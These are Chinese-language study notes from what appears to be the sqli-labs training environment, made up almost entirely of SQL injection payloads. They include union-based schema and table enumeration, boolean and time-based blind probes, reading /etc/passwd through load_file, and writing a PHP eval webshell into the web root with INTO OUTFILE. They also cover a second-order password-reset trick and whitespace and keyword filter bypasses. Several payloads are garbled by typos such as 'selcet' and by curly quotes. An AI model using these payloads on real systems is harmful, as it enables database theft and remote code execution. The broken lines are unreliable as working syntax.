1、Less-1
   1.1 原始语句：select * from where id='$id' limit 0,1;
       payload:
                or 1=1--+
                'or 1=1--+
                "or 1=1--+
                )or 1=1--+
                ')or 1=1--+
                ") or 1=1--+
                "))or 1=1--+
                1' or '1'='1'--+
                -1' union select 1,2,concat_ws(char(32,58,32),user(),database(),version())
                -1’ union select 1,group_concat(schema_name),3 from information_schema.schemata--+
                -1' union selcet 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
                -1’union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’users’–-+
   1.2 测试payload:
       # 获取数据库信息：
       http://172.16.167.167/sql/Less-1/?id=
       -1’ union select 1,group_concat(schema_name),3 from information_schema.schemata--+
       # 基于盲注的方式：
       http://172.16.167.167/sql/Less-5/?id=1' and left(version(),1)=5--+
       http://172.16.167.167/sql/Less-5/?id=1' and length(database())=8--+
       http://172.16.167.167/sql/Less-5/?id=1' and left(database,1)='su'--+
       # 延时注入
       http://172.16.167.167/sql/Less-5/?id=1' and if(ascii(substr(database(),1,1))=115,1,sleep(5))--+
       当有错误的时候，会有5s的时间延时；
       http://172.16.167.167/sql/Less-6/?id=1" and (select count(*) from mysql.user)>0--+
       http://172.16.167.167/sql/Less-6/?id=1" and select 1,2,3,load_file("/etc/passwd")--+
       导入到文件中：
       select * from users into outfile '/var/www/html'
       将数据库中到数据导入到文件中，可以通过http进行访问，获取文件内容；但是需保证，该目录具有写权限；
       chmod -R 777 /var/www/html
       将一句话直接写入到html文件夹中：
       http://172.16.167.167/sql/Less-7/?id=1')) union select 1,2,'<?php @eval($_get['mima'])?>' into outfile "/var/www/html/yijuhua.php"
       http://172.16.167.167/sql/Less-7/?id=1'))UNION SELECT 1,2,'<?php @eval($_post[“mima”])?>' into outfile "/var/www/html/yijuhua.php"


       SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1
       http://172.16.167.167/sql/Less-23/index.php?id=-1'union select 1,@@datadir,'3
       http://www.3stone.com/sql/Less-27/?id=100%27unIon%a0SelEcT%a01,database(),3||%271

    1.3 sql注入进阶：
       1.3.1先注册一个账号：admin’#，然后登陆该账号进行修改密码：
            UPDATE users SET passwd="New_Pass" WHERE username =' admin' # ' AND password=' ，也就是执行了 UPDATE users SET passwd="New_Pass" WHERE username =' admin'
         3.2 用|| && 来代替and, or:
            http://172.16.167.167/sql/Less-25a/?id=20||1=1--+
            %09 TAB键
            %0a 新建一行
            %0c    新的一页
            %0d    return 功能
            %0b    TAB
            %a0    空格
         3.3 如果SQL注入语法中，过滤了空格，语句中出现空格就报错：
            3.3.1 水平制表符%09
            3.3.2 注释绕过空格 /**/
            3.3.3 括号绕过空格的方法：index.php?id=(sleep(ascii(mid(user()from(2)for(1)))=109))
         3.4 \s匹配任何空白字符,包括空格、制表符、换页符等，全部过滤掉:
            使用/*注释*/绕过过滤
         3.5 正则表达式值确保了参数id是以一个数字结尾的.他不能确保id参数的开头是合法的.
            payload后面加上数字.比如你可以这样:1 or 1=1 # 123.

